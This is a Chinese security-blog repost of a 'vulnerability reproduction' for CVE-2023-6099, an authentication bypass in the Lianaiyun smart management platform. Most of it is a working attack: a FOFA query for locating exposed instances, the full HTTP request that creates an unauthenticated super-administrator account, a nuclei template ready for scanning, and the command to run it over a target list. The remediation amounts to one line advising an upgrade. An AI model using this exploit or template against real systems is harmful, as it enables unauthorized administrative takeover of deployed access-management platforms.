【1day】CVE-2023-6099 漏洞复现 nuclei poc

admin 2023年11月22日14:26:00评论219 views字数 1461阅读4分52秒阅读模式


使



01

漏洞名称



优卡特脸爱云一脸通智慧管理平台权限绕过漏洞


02


漏洞影响


1.0.55.0.0.1及其以下版

【1day】CVE-2023-6099 漏洞复现 nuclei poc


03


漏洞描述


脸爱云一脸通智慧管理平台1.0.55.0.0.1及其以下版本SystemMng.ashx接口处存在权限绕过漏洞,通过输入00操纵参数operatorRole,导致特权管理不当,未经身份认证的攻击者可以通过此漏洞创建超级管理员账户。


04


FOFA搜索语句
title="欢迎使用脸爱云 一脸通智慧管理平台"

【1day】CVE-2023-6099 漏洞复现 nuclei poc


05


漏洞复现


向靶场发送如下数据包

POST /SystemMng.ashx HTTP/1.1Host: User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept-Encoding: gzip, deflateAccept: */*Connection: closeAccept-Language: enContent-Length: 174
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

响应200即成功创建账号test123456/123456

登录后台可以看到拥有管理员权限

证明存在漏洞


06


nuclei poc


poc文件内容如下

id: CVE-2023-6099
info: name: 优卡特脸爱云一脸通智慧管理平台权限绕过漏洞 author: fgz severity: high description: '脸爱云一脸通智慧管理平台1.0.55.0.0.1及其以下版本SystemMng.ashx接口处存在权限绕过漏洞,通过输入00操纵参数operatorRole,导致特权管理不当,未经身份认证的攻击者可以通过此漏洞创建超级管理员账户。' tags: 2023 metadata: max-request: 3 fofa-query: title="欢迎使用脸爱云 一脸通智慧管理平台" verified: true
http: - method: POST path: - "{{BaseURL}}/SystemMng.ashx" headers: Accept-Encoding: gzip, deflate Accept-Language: en body: "operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators" matchers: - type: dsl dsl: - "status_code == 200"

运行POC

nuclei.exe -t CVE-2023-6099.yaml -l 1.txt

【1day】CVE-2023-6099 漏洞复现 nuclei poc


07


修复建议


升级到最新版本。


原文始发于微信公众号(AI与网安):【1day】CVE-2023-6099 漏洞复现 nuclei poc

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月22日14:26:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【1day】CVE-2023-6099 漏洞复现 nuclei pochttp://cn-sec.com/archives/2228533.html

发表评论

匿名网友 填写信息